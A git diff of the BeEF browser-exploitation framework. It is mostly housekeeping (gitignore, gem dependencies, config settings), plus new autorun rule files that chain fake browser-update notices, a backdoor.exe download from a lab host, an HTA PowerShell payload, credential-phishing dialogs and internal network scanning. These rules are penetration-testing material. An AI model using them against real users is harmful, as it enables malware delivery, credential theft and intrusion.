Update context menu

Prevent duplicates
Add method to remove network host
2015-12-23 11:15:36 +00:00 · 2015-12-23 11:14:55 +00:00 · 2015-12-19 05:55:36 +00:00 · 2015-12-19 04:57:50 +00:00 · 2015-12-19 03:58:47 +00:00 · 2015-12-19 03:22:01 +00:00
1246 changed files with 25044 additions and 3468 deletions
--- a/.gitignore
+++ b/.gitignore
@@ -1,8 +1,104 @@
+### BeEF ###
 beef.db
 test/msf-test
+extensions/admin_ui/media/javascript-min/
 custom-config.yaml
 .DS_Store
 .gitignore
 .rvmrc

 *.lock
+
+extensions/metasploit/msf-exploits.cache
+
+# The following lines were created by https://www.gitignore.io
+
+### Linux ###
+*~
+
+# KDE directory preferences
+.directory
+
+
+### vim ###
+[._]*.s[a-w][a-z]
+[._]s[a-w][a-z]
+*.un~
+Session.vim
+.netrwhist
+*~
+
+
+### Emacs ###
+# -*- mode: gitignore; -*-
+*~
+\#*\#
+/.emacs.desktop
+/.emacs.desktop.lock
+*.elc
+auto-save-list
+tramp
+.\#*
+
+# Org-mode
+.org-id-locations
+*_archive
+
+# flymake-mode
+*_flymake.*
+
+# eshell files
+/eshell/history
+/eshell/lastdir
+
+# elpa packages
+/elpa/
+
+# reftex files
+*.rel
+
+# AUCTeX auto folder
+/auto/
+
+# cask packages
+.cask/
+
+
+### nanoc ###
+# For projects using nanoc (http://nanoc.ws/)
+
+# Default location for output, needs to match output_dir's value found in config.yaml
+output/
+
+# Temporary file directory
+tmp/
+
+# Crash Log
+crash.log
+
+
+### Windows ###
+# Windows image file caches
+Thumbs.db
+ehthumbs.db
+
+# Folder config file
+Desktop.ini
+
+# Recycle Bin used on file shares
+$RECYCLE.BIN/
+
+# Windows Installer files
+*.cab
+*.msi
+*.msm
+*.msp
+
+# Windows shortcuts
+*.lnk
+
+
+### TortoiseGit ###
+# Project-level settings
+/.tgitconfig
+
--- a/.ruby-gemset
+++ b/.ruby-gemset
@@ -0,0 +1 @@
+beef
--- a/.ruby-version
+++ b/.ruby-version
@@ -0,0 +1 @@
+2.2.4
--- a/BeEFLive.sh
+++ b/BeEFLive.sh
@@ -1,2 +0,0 @@
-# Reference for old (<1.2) versions of BeEF Live
-bash /opt/beef/liveCD/BeEFLive.sh
--- a/81
+++ b/81
@@ -1,61 +1,66 @@
 # BeEF's Gemfile

 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

-gem "eventmachine", "1.0.3"
-gem "thin"
-gem "sinatra", "1.4.2"
-gem "rack", "1.5.2"
-gem "em-websocket", "~> 0.3.6" # WebSocket support
-gem "uglifier", "~> 2.2.1"
+gem 'eventmachine'
+gem 'thin'
+gem 'sinatra'
+gem 'rack'
+gem 'em-websocket', '~> 0.3.6' # WebSocket support
+gem 'uglifier', '~> 2.2.1'
+gem 'mime-types'
+

 # Windows support
-if RUBY_PLATFORM.downcase.include?("mswin") || RUBY_PLATFORM.downcase.include?("mingw")
+if RUBY_PLATFORM.downcase.include?('mswin') || RUBY_PLATFORM.downcase.include?('mingw')
  # make sure you install this gem following https://github.com/hiranpeiris/therubyracer_for_windows
-  gem "therubyracer", "~> 0.11.0beta1"
-  gem "execjs"
-  gem "win32console"
-elsif !RUBY_PLATFORM.downcase.include?("darwin")
-  gem "therubyracer"
-  gem "execjs"
+  gem 'therubyracer', '~> 0.11.0beta1'
+  gem 'execjs'
+  gem 'win32console'
+elsif !RUBY_PLATFORM.downcase.include?('darwin')
+  gem 'therubyracer', '0.11.3'
+  gem 'execjs'
 end
+ 

-gem "ansi"
-gem "term-ansicolor", :require => "term/ansicolor"
-gem "dm-core"
-gem "json"
-gem "data_objects"
-gem "dm-sqlite-adapter"  # SQLite support
+gem 'ansi'
+gem 'term-ansicolor', :require => 'term/ansicolor'
+gem 'dm-core'
+gem 'json'
+gem 'data_objects'
+gem 'dm-sqlite-adapter'  # SQLite support
 #gem dm-postgres-adapter # PostgreSQL support
 #gem dm-mysql-adapter    # MySQL support
-gem "parseconfig"
-gem "erubis"
-gem "dm-migrations"
-gem "msfrpc-client"        # Metasploit Integration extension
-#gem "twitter", ">= 5.0.0" # Twitter Notifications extension
-gem "rubyzip", ">= 1.0.0"
-gem "rubydns"              # DNS extension
-gem "sourcify"
-gem "geoip"                # geolocation support
+gem 'parseconfig'
+gem 'erubis'
+gem 'dm-migrations'
+gem 'msfrpc-client'        # Metasploit Integration extension
+#gem 'twitter', '>= 5.0.0' # Twitter Notifications extension
+gem 'rubyzip', '>= 1.0.0'
+gem 'rubydns', '0.7.0'     # DNS extension
+gem 'geoip'                # geolocation support
+gem 'dm-serializer'        # network extension
+gem 'qr4r'                 # QRcode extension

 # For running unit tests
 if ENV['BEEF_TEST']
-  gem "test-unit"
-  gem "test-unit-full"
-  gem "curb"
-  gem "test-unit"
-  gem "selenium"
-  gem "selenium-webdriver"
+  gem 'test-unit'
+  gem 'test-unit-full'
+  gem 'curb'
+  gem 'selenium'
+  gem 'selenium-webdriver'
+  gem 'rspec'
+  gem 'bundler-audit'
  # nokogirl is needed by capybara which may require one of the below commands
  # sudo apt-get install libxslt-dev libxml2-dev
  # sudo port install libxml2 libxslt
-  gem "capybara"
+  gem 'capybara'
  # RESTful API tests/generic command module tests
-  gem "rest-client", "~> 1.6.7"
+  gem 'rest-client', '~> 1.8.0'
 end

-source "http://rubygems.org"
+source 'https://rubygems.org'
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -0,0 +1,213 @@
+GEM
+  remote: https://rubygems.org/
+  specs:
+    addressable (2.3.6)
+    ansi (1.4.3)
+    atk (3.0.7)
+      glib2 (= 3.0.7)
+    bundler-audit (0.4.0)
+      bundler (~> 1.2)
+      thor (~> 0.18)
+    cairo (1.14.3)
+      pkg-config (>= 1.1.5)
+    capybara (2.5.0)
+      mime-types (>= 1.16)
+      nokogiri (>= 1.3.3)
+      rack (>= 1.0.0)
+      rack-test (>= 0.5.4)
+      xpath (~> 2.0)
+    childprocess (0.5.8)
+      ffi (~> 1.0, >= 1.0.11)
+    chunky_png (1.3.5)
+    curb (0.8.8)
+    daemons (1.1.9)
+    data_objects (0.10.14)
+      addressable (~> 2.1)
+    diff-lcs (1.2.5)
+    dm-core (1.2.1)
+      addressable (~> 2.3)
+    dm-do-adapter (1.2.0)
+      data_objects (~> 0.10.6)
+      dm-core (~> 1.2.0)
+    dm-migrations (1.2.0)
+      dm-core (~> 1.2.0)
+    dm-serializer (1.2.2)
+      dm-core (~> 1.2.0)
+      fastercsv (~> 1.5)
+      json (~> 1.6)
+      json_pure (~> 1.6)
+      multi_json (~> 1.0)
+    dm-sqlite-adapter (1.2.0)
+      dm-do-adapter (~> 1.2.0)
+      do_sqlite3 (~> 0.10.6)
+    do_sqlite3 (0.10.14)
+      data_objects (= 0.10.14)
+    domain_name (0.5.25)
+      unf (>= 0.0.5, < 1.0.0)
+    em-websocket (0.3.8)
+      addressable (>= 2.1.1)
+      eventmachine (>= 0.12.9)
+    erubis (2.7.0)
+    eventmachine (1.0.7)
+    execjs (2.0.2)
+    fastercsv (1.5.5)
+    ffi (1.9.10)
+    gdk_pixbuf2 (3.0.7)
+      glib2 (= 3.0.7)
+    geoip (1.4.0)
+    glib2 (3.0.7)
+      pkg-config
+    gtk2 (3.0.7)
+      atk (= 3.0.7)
+      gdk_pixbuf2 (= 3.0.7)
+      pango (= 3.0.7)
+    hoe (3.14.2)
+      rake (>= 0.8, < 11.0)
+    http-cookie (1.0.2)
+      domain_name (~> 0.5)
+    jar_wrapper (0.1.8)
+      zip
+    json (1.8.1)
+    json_pure (1.8.3)
+    librex (0.0.68)
+    mime-types (2.99)
+    mini_portile (0.6.2)
+    mojo_magick (0.5.6)
+    msfrpc-client (1.0.1)
+      librex (>= 0.0.32)
+      msgpack (>= 0.4.5)
+    msgpack (0.5.8)
+    multi_json (1.9.3)
+    netrc (0.11.0)
+    nokogiri (1.6.6.4)
+      mini_portile (~> 0.6.0)
+    pango (3.0.7)
+      cairo (>= 1.14.0)
+      glib2 (= 3.0.7)
+    parseconfig (1.0.4)
+    pkg-config (1.1.6)
+    power_assert (0.2.6)
+    qr4r (0.4.0)
+      mojo_magick
+      rqrcode
+    rack (1.5.2)
+    rack-protection (1.5.3)
+      rack
+    rack-test (0.6.3)
+      rack (>= 1.0)
+    rainbow (2.0.0)
+    rake (10.4.2)
+    rest-client (1.8.0)
+      http-cookie (>= 1.0.2, < 2.0)
+      mime-types (>= 1.16, < 3.0)
+      netrc (~> 0.7)
+    rexec (1.6.3)
+      rainbow
+    rqrcode (0.7.0)
+      chunky_png
+    rr (1.1.2)
+    rspec (3.4.0)
+      rspec-core (~> 3.4.0)
+      rspec-expectations (~> 3.4.0)
+      rspec-mocks (~> 3.4.0)
+    rspec-core (3.4.1)
+      rspec-support (~> 3.4.0)
+    rspec-expectations (3.4.0)
+      diff-lcs (>= 1.2.0, < 2.0)
+      rspec-support (~> 3.4.0)
+    rspec-mocks (3.4.0)
+      diff-lcs (>= 1.2.0, < 2.0)
+      rspec-support (~> 3.4.0)
+    rspec-support (3.4.1)
+    rubydns (0.7.0)
+      eventmachine (~> 1.0.0)
+      rexec (~> 1.6.2)
+    rubyzip (1.1.3)
+    selenium (0.2.11)
+      jar_wrapper
+    selenium-webdriver (2.48.1)
+      childprocess (~> 0.5)
+      multi_json (~> 1.0)
+      rubyzip (~> 1.0)
+      websocket (~> 1.0)
+    sinatra (1.4.2)
+      rack (~> 1.5, >= 1.5.2)
+      rack-protection (~> 1.4)
+      tilt (~> 1.3, >= 1.3.4)
+    term-ansicolor (1.1.5)
+    test-unit (3.1.5)
+      power_assert
+    test-unit-full (0.0.3)
+      test-unit
+      test-unit-notify
+      test-unit-rr
+      test-unit-runner-fox
+      test-unit-runner-gtk2
+      test-unit-runner-tk
+    test-unit-notify (1.0.4)
+      test-unit (>= 2.4.9)
+    test-unit-rr (1.0.3)
+      rr (>= 1.1.1)
+      test-unit (>= 2.5.2)
+    test-unit-runner-fox (0.0.1)
+      hoe (>= 1.6.0)
+    test-unit-runner-gtk2 (0.0.2)
+      gtk2
+      test-unit
+    test-unit-runner-tk (0.0.1)
+      hoe (>= 1.6.0)
+    thin (1.6.2)
+      daemons (>= 1.0.9)
+      eventmachine (>= 1.0.0)
+      rack (>= 1.0.0)
+    thor (0.19.1)
+    tilt (1.4.1)
+    uglifier (2.2.1)
+      execjs (>= 0.3.0)
+      multi_json (~> 1.0, >= 1.0.2)
+    unf (0.1.4)
+      unf_ext
+    unf_ext (0.0.7.1)
+    websocket (1.2.2)
+    xpath (2.0.0)
+      nokogiri (~> 1.3)
+    zip (2.0.2)
+
+PLATFORMS
+  ruby
+
+DEPENDENCIES
+  ansi
+  bundler-audit
+  capybara
+  curb
+  data_objects
+  dm-core
+  dm-migrations
+  dm-serializer
+  dm-sqlite-adapter
+  em-websocket (~> 0.3.6)
+  erubis
+  eventmachine
+  geoip
+  json
+  mime-types
+  msfrpc-client
+  parseconfig
+  qr4r
+  rack
+  rest-client (~> 1.8.0)
+  rspec
+  rubydns (= 0.7.0)
+  rubyzip (>= 1.0.0)
+  selenium
+  selenium-webdriver
+  sinatra
+  term-ansicolor
+  test-unit
+  test-unit-full
+  thin
+  uglifier (~> 2.2.1)
+
+BUNDLED WITH
+   1.10.6
--- a/INSTALL.txt
+++ b/INSTALL.txt
@@ -1,6 +1,6 @@
 ===============================================================================
   
-    Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
    Browser Exploitation Framework (BeEF) - http://beefproject.com
    See the file 'doc/COPYING' for copying permission

@@ -33,8 +33,10 @@ Installation

 	  http://www.sqlite.org/sqlitedll-3_7_0_1.zip

-	  Other than that, you also need TheRubyRacer. As it's painful to install it on Windows, you can download 2 pre-compiled V8 DLLs and 2 gems from https://github.com/hiranpeiris/therubyracer_for_windows.
+	  Other than that, you also need TheRubyRacer. As it's painful to install it on Windows, you can download 2 pre-compiled V8 DLLs and 2 gems from https://github.com/eakmotion/therubyracer_for_windows.

+	Finally, edit beef's gem lock file by replacing the required ruby racer version with the version downloaded from the link above. 
+	
   3. Prerequisites (Linux)

      !!! This must be done PRIOR to running the bundle install command !!!
@@ -51,8 +53,8 @@ Installation
      - XCode: provides the sqlite support BeEF needs
      
      - Ruby 1.9
-      	To install RVM and Ruby 1.9.3 on Mac OS:  
-      	$ bash -s stable < <(curl -s https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile 
+      	To install RVM and Ruby 1.9.3 on Mac OS:
+      	$ bash -s stable < <(curl -Ls https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer) source ~/.bash_profile
      	$ rvm install 1.9.3-p484
 		$ rvm use 1.9.3
      
--- a/8
+++ b/8
@@ -1,6 +1,6 @@
 ===============================================================================
   
-    Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
    Browser Exploitation Framework (BeEF) - http://beefproject.com
    See the file 'doc/COPYING' for copying permission

@@ -24,7 +24,9 @@ Please, send us pull requests!

 Web: http://beefproject.com/

-Mail: beef-subscribe@bindshell.net
+Bugs: https://github.com/beefproject/beef
+
+Security Bugs: security@beefproject.com

 IRC: ircs://irc.freenode.net/beefproject

@@ -48,7 +50,7 @@ __The following is for the impatient.__
 For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
 We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation

-   $ bash -s stable < <(curl -s https://raw.github.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)
+   $ bash -s stable < <(curl -Ls https://raw.githubusercontent.com/beefproject/beef/a6a7536e736e7788e12df91756a8f132ced24970/install-beef)


 Usage 
--- a/README.mkd
+++ b/README.mkd
@@ -1,6 +1,6 @@
 ===============================================================================
   
-    Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+    Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
    Browser Exploitation Framework (BeEF) - http://beefproject.com
    See the file 'doc/COPYING' for copying permission

@@ -24,7 +24,9 @@ __Please, send us pull requests!__

 __Web:__ http://beefproject.com/

-__Mail:__ beef-subscribe@bindshell.net
+__Bugs:__ https://github.com/beefproject/beef
+
+__Security Bugs:__ security@beefproject.com

 __IRC:__ ircs://irc.freenode.net/beefproject

@@ -48,7 +50,7 @@ __The following is for the impatient.__
 For full installation details (including on Microsoft Windows), please refer to INSTALL.txt.
 We also have a Wiki page at https://github.com/beefproject/beef/wiki/Installation

-       $ curl https://raw.github.com/beefproject/beef/a6a7536e/install-beef | bash -s stable
+       $ curl -L https://raw.githubusercontent.com/beefproject/beef/a6a7536e/install-beef | bash -s stable


 Usage 
--- a/36
+++ b/36
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -45,10 +45,44 @@ task :msf => ["install", "msf_install"] do
  Rake::Task['msf_stop'].invoke
 end

+
+################################
+# run bundle-audit
+
+namespace :bundle_audit do
+  require 'bundler/audit/cli'
+
+  desc 'Update bundle-audit database'
+  task :update do
+    Bundler::Audit::CLI.new.update
+  end
+
+  desc 'Check gems for vulns using bundle-audit'
+  task :check do
+    Bundler::Audit::CLI.new.check
+  end
+
+  desc 'Update vulns database and check gems using bundle-audit'
+  task :run do
+    Rake::Task['bundle_audit:update'].invoke
+    Rake::Task['bundle_audit:check'].invoke
+  end
+end
+
+desc "Run bundle-audit"
+task :bundle_audit do
+  Rake::Task['bundle_audit:run'].invoke
+end
+
+
+################################
+# Install
+
 #task :install do
 #  sh "export BEEF_TEST=true"
 #end

+
 ################################
 # X11 set up

--- a/4
+++ b/4
@@ -1,7 +1,7 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #

-0.4.5.0-alpha
+0.4.6.1-alpha
--- a/arerules/c_osx_test-return-mods.json
+++ b/arerules/c_osx_test-return-mods.json
@@ -0,0 +1,35 @@
+{
+  "name": "Test return debug stuff",
+  "author": "antisnatchor",
+  "browser": "S",
+  "browser_version": ">= 7",
+  "os": "OSX",
+  "os_version": "<= 10.10",
+  "modules": [{
+    "name": "test_return_ascii_chars",
+    "condition": null,
+    "options": {}
+  }, {
+    "name": "test_return_long_string",
+    "condition": "status==1",
+    "code": "var mod_input=test_return_ascii_chars_mod_output + '--(CICCIO)--';",
+    "options": {
+      "repeat": "10",
+      "repeat_string": "<<mod_input>>"
+    }
+  },
+    {
+      "name": "alert_dialog",
+      "condition": "status=1",
+      "code": "var mod_input=test_return_long_string_mod_output + '--(PASTICCIO)--';",
+      "options":{"text":"<<mod_input>>"}
+    },
+   {
+    "name": "get_page_html",
+    "condition": null,
+    "options": {}
+  }],
+  "execution_order": [0, 1, 2, 3],
+  "execution_delay": [0, 0, 0, 0],
+  "chain_mode": "nested-forward"
+}
--- a/arerules/enabled/README
+++ b/arerules/enabled/README
@@ -0,0 +1,2 @@
+Move here the ARE rule files that you want to pre-load when BeEF starts.
+Make sure they are .json files (any other file extension is ignored).
--- a/arerules/ff_osx_extension-dropper.json
+++ b/arerules/ff_osx_extension-dropper.json
@@ -0,0 +1,20 @@
+{
+  "name": "Firefox Extension Dropper",
+  "author": "antisnatchor",
+  "browser": "FF",
+  "browser_version": "ALL",
+  "os": "OSX",
+  "os_version": ">= 10.8",
+  "modules": [{
+    "name": "firefox_extension_dropper",
+    "condition": null,
+    "options": {
+      "extension_name": "Ummeneske",
+      "xpi_name": "Ummeneske",
+      "base_host": "http://172.16.45.1:3000"
+    }
+  }],
+  "execution_order": [0],
+  "execution_delay": [0],
+  "chain_mode": "sequential"
+}
--- a/arerules/ff_tux_webrtc-internalip.json
+++ b/arerules/ff_tux_webrtc-internalip.json
@@ -0,0 +1,28 @@
+{"name": "Get Internal IP (WebRTC)",
+  "author": "antisnatchor",
+  "browser": "FF",
+  "browser_version": ">= 31",
+  "os": "Linux",
+  "os_version": "ALL",
+  "modules": [
+    {"name": "get_internal_ip_webrtc",
+      "condition": null,
+      "code": null,
+      "options": {}
+    },
+    {"name": "internal_network_fingerprinting",
+      "condition": "status==1",
+      "code": "var s=get_internal_ip_webrtc_mod_output.split('.');var start=parseInt(s[3])-1;var end=parseInt(s[3])+1;var mod_input = s[0]+'.'+s[1]+'.'+s[2]+'.'+start+'-'+s[0]+'.'+s[1]+'.'+s[2]+'.'+end;",
+      "options": {
+        "ipRange":"<<mod_input>>",
+        "ports":"80",
+        "threads":"5",
+        "wait":"2",
+        "timeout":"10"
+      }
+    }
+  ],
+  "execution_order": [0,1],
+  "execution_delay": [0, 0],
+  "chain_mode": "nested-forward"
+}
--- a/arerules/ie_win_fakenotification-clippy.json
+++ b/arerules/ie_win_fakenotification-clippy.json
@@ -0,0 +1,31 @@
+{
+  "name": "Ie Fake Notification + Clippy",
+  "author": "antisnatchor",
+  "browser": "IE",
+  "browser_version": "== 11",
+  "os": "Windows",
+  "os_version": ">= 7",
+  "modules": [
+    {
+      "name": "fake_notification_ie",
+      "condition": null,
+      "options": {
+        "notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please update it."
+      }
+    }
+  ,{
+      "name": "clippy",
+      "condition": null,
+      "options": {
+        "clippydir": "http://172.16.45.1:3000/clippy/",
+        "askusertext": "Your browser appears to be out of date. Would you like to upgrade it?",
+        "executeyes": "http://172.16.45.1:3000/updates/backdoor.exe",
+        "respawntime":"5000",
+        "thankyoumessage":"Thanks for upgrading your browser! Look forward to a safer, faster web!"
+      }
+    }
+  ],
+  "execution_order": [0,1],
+  "execution_delay": [0,2000],
+  "chain_mode": "sequential"
+}
--- a/arerules/ie_win_htapowershell.json
+++ b/arerules/ie_win_htapowershell.json
@@ -0,0 +1,27 @@
+{
+  "name": "HTA PowerShell",
+  "author": "antisnatchor",
+  "browser": "IE",
+  "browser_version": "ALL",
+  "os": "Windows",
+  "os_version": ">= 7",
+  "modules": [
+    {
+      "name": "fake_notification_ie",
+      "condition": null,
+      "options": {
+        "notification_text":"Internet Explorer SECURITY NOTIFICATION: your browser is outdated and vulnerable to critical security vulnerabilities like CVE-2015-009 and CVE-2014-879. Please apply the Microsoft Update below:"
+      }
+    },
+    {
+      "name": "hta_powershell",
+      "condition": null,
+      "options": {
+        "domain":"http://172.16.45.1:3000",
+        "ps_url":"/ps"
+      }
+    }],
+  "execution_order": [0,1],
+  "execution_delay": [0,500],
+  "chain_mode": "sequential"
+}
--- a/arerules/ie_win_missingflash-prettytheft.json
+++ b/arerules/ie_win_missingflash-prettytheft.json
@@ -0,0 +1,27 @@
+{
+  "name": "Fake missing plugin + Pretty Theft LinkedIn",
+  "author": "antisnatchor",
+  "browser": "IE",
+  "browser_version": ">= 8",
+  "os": "Windows",
+  "os_version": "== XP",
+  "modules": [{
+    "name": "fake_notification_c",
+    "condition": null,
+    "options": {
+      "url": "http://172.16.45.1:3000/updates/backdoor.exe",
+      "notification_text": "The version of the Adobe Flash plugin is outdated and does not include the latest security updates. Please ignore the missing signature, we at Adobe are working on it. "
+    }
+  }, {
+    "name": "pretty_theft",
+    "condition": null,
+    "options": {
+      "choice": "Windows",
+      "backing": "Grey",
+      "imgsauce": "http://172.16.45.1:3000/ui/media/images/beef.png"
+    }
+  }],
+  "execution_order": [0, 1],
+  "execution_delay": [0, 5000],
+  "chain_mode": "sequential"
+}
--- a/arerules/ie_win_test-return-mods.json
+++ b/arerules/ie_win_test-return-mods.json
@@ -0,0 +1,35 @@
+{
+  "name": "Test return debug stuff",
+  "author": "antisnatchor",
+  "browser": "IE",
+  "browser_version": "<= 8",
+  "os": "Windows",
+  "os_version": ">= XP",
+  "modules": [{
+    "name": "test_return_ascii_chars",
+    "condition": null,
+    "options": {}
+  }, {
+    "name": "test_return_long_string",
+    "condition": "status==1",
+    "code": "var mod_input=test_return_ascii_chars_mod_output + '--CICCIO--';",
+    "options": {
+      "repeat": "10",
+      "repeat_string": "<<mod_input>>"
+    }
+  },
+    {
+      "name": "alert_dialog",
+      "condition": "status=1",
+      "code": "var mod_input=test_return_long_string_mod_output + '--PASTICCIO--';",
+      "options":{"text":"<<mod_input>>"}
+    },
+   {
+    "name": "get_page_html",
+    "condition": null,
+    "options": {}
+  }],
+  "execution_order": [0, 1, 2, 3],
+  "execution_delay": [0, 0, 0, 0],
+  "chain_mode": "nested-forward"
+}
--- a/20
+++ b/20
@@ -1,7 +1,7 @@
 #!/usr/bin/env ruby

 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
@@ -35,7 +35,7 @@ require 'core/loader'
 if BeEF::Core::Console::CommandLine.parse[:ext_config].empty?
  config = BeEF::Core::Configuration.new("#{$root_dir}/config.yaml")
 else
-  config = BeEF::Core::Configuration.new("#{$root_dir}/#{BeEF::Core::Console::CommandLine.parse[:ext_config]}")
+  config = BeEF::Core::Configuration.new("#{BeEF::Core::Console::CommandLine.parse[:ext_config]}")
 end

 # @note After the BeEF core is loaded, bootstrap the rest of the framework internals
@@ -58,6 +58,11 @@ unless BeEF::Core::Console::CommandLine.parse[:ws_port].empty?
  config.set('beef.http.websocket.port', BeEF::Core::Console::CommandLine.parse[:ws_port])
 end

+# @note Check if interactive was specified from the command line, therefore override the extension to enable
+if BeEF::Core::Console::CommandLine.parse[:interactive] == true
+  config.set('beef.extension.console.shell.enable',true)
+end
+
 # @note Prints BeEF welcome message
 BeEF::Core::Console::Banners.print_welcome_msg

@@ -125,12 +130,21 @@ end
 # @note Call the API method 'pre_http_start'
 BeEF::API::Registrar.instance.fire(BeEF::API::Server, 'pre_http_start', http_hook_server)

+# Load any ARE (Autorun Rule Engine) rules scanning the <beef_root>/arerules/enabled directory
+BeEF::Core::AutorunEngine::RuleLoader.instance.load_directory
+
 # @note Start the HTTP Server, we additionally check whether we load the Console Shell or not
 if config.get("beef.extension.console.shell.enable") == true
  require 'extensions/console/shell'
  puts ""
  begin
-    FileUtils.mkdir_p(File.expand_path(config.get("beef.extension.console.shell.historyfolder")))
+    log_dir = File.expand_path(config.get("beef.extension.console.shell.historyfolder"))
+    FileUtils.mkdir_p(log_dir) unless File.directory?(log_dir)
+  rescue => e
+    print_error "Could not create log directory for shell history '#{log_dir}': #{e.message}"
+    exit 1
+  end
+  begin
    BeEF::Extension::Console::Shell.new(BeEF::Extension::Console::Shell::DefaultPrompt,
                                        BeEF::Extension::Console::Shell::DefaultPromptChar, {'config' => config, 'http_hook_server' => http_hook_server}).run
  rescue Interrupt
--- a/config.yaml
+++ b/config.yaml
@@ -1,12 +1,12 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
 # BeEF Configuration file

 beef:
-    version: '0.4.5.0-alpha'
+    version: '0.4.6.1-alpha'
    # More verbose messages (server-side)
    debug: false
    # More verbose messages (client-side)
@@ -33,7 +33,7 @@ beef:
        # NOTE: A poll timeout of less than 5,000 (ms) might impact performance
        #  when hooking lots of browsers (50+).
        # Enabling WebSockets is generally better (beef.websocket.enable)
-        xhr_poll_timeout: 5000
+        xhr_poll_timeout: 1000

        # Reverse Proxy / NAT
        # If BeEF is running behind a reverse proxy or NAT
@@ -73,7 +73,8 @@ beef:
        web_server_imitation:
            enable: true
            type: "apache" # Supported: apache, iis, nginx
-
+            hook_404: false # inject BeEF hook in HTTP 404 responses
+            hook_root: false # inject BeEF hook in the server home page
        # Experimental HTTPS support for the hook / admin / all other Thin managed web services
        https:
            enable: false
@@ -100,10 +101,10 @@ beef:

        # db connection information is only used for mysql/postgres
        db_host: "localhost"
-        db_port: 5432
+        db_port: 3306
        db_name: "beef"
        db_user: "beef"
-        db_passwd: "beef123"
+        db_passwd: "beef"
        db_encoding: "UTF-8"

    # Credentials to authenticate in BeEF.
@@ -112,12 +113,21 @@ beef:
        user:   "beef"
        passwd: "beef"

-    # Autorun modules as soon the browser is hooked.
-    # NOTE: only modules with target type 'working' or 'user_notify' can be run automatically.
+    # Autorun Rule Engine
    autorun:
-        enable: true
-        # set this to TRUE if you want to allow auto-run execution for modules with target->user_notify
-        allow_user_notify: true
+        # this is used when rule chain_mode type is nested-forward, needed as command results are checked via setInterval
+        # to ensure that we can wait for async command results. The timeout is needed to prevent infinite loops or eventually
+        # continue execution regardless of results.
+        # If you're chaining multiple async modules, and you expect them to complete in more than 5 seconds, increase the timeout.
+        result_poll_interval: 300
+        result_poll_timeout: 5000
+
+        # If the modules doesn't return status/results and timeout exceeded, continue anyway with the chain.
+        # This is useful to call modules (nested-forward chain mode) that are not returning their status/results.
+        continue_after_timeout: true
+
+    # Enables DNS lookups on zombie IP addresses
+    dns_hostname_lookup: false

    # IP Geolocation
    # NOTE: requires MaxMind database:
@@ -127,12 +137,21 @@ beef:
        enable: false
        database: '/opt/GeoIP/GeoLiteCity.dat'

+    # Integration with PhishingFrenzy
+    # If enabled BeEF will try to get the UID parameter value from the hooked URI, as this is used by PhishingFrenzy
+    # to uniquely identify the victims. In this way you can easily associate phishing emails with hooked browser.
+    integration:
+        phishing_frenzy:
+            enable: false
+
    # You may override default extension configuration parameters here
    extension:
        requester:
            enable: true
        proxy:
            enable: true
+            key: "beef_key.pem"
+            cert: "beef_cert.pem"
        metasploit:
            enable: false
        social_engineering:
@@ -144,6 +163,9 @@ beef:
                enable: false
        ipec:
            enable: true
-        # this is still experimental, we're working on it..
+        # this is still experimental..
        dns:
+            enable: true
+        # this is still experimental..
+        dns_rebinding:
            enable: false
--- a/core/api.rb
+++ b/core/api.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/extension.rb
+++ b/core/api/extension.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/extensions.rb
+++ b/core/api/extensions.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
--- a/core/api/main/configuration.rb
+++ b/core/api/main/configuration.rb
@@ -1,5 +1,5 @@
 #
-# Copyright (c) 2006-2014 Wade Alcorn - wade@bindshell.net
+# Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
 # Browser Exploitation Framework (BeEF) - http://beefproject.com
 # See the file 'doc/COPYING' for copying permission
 #
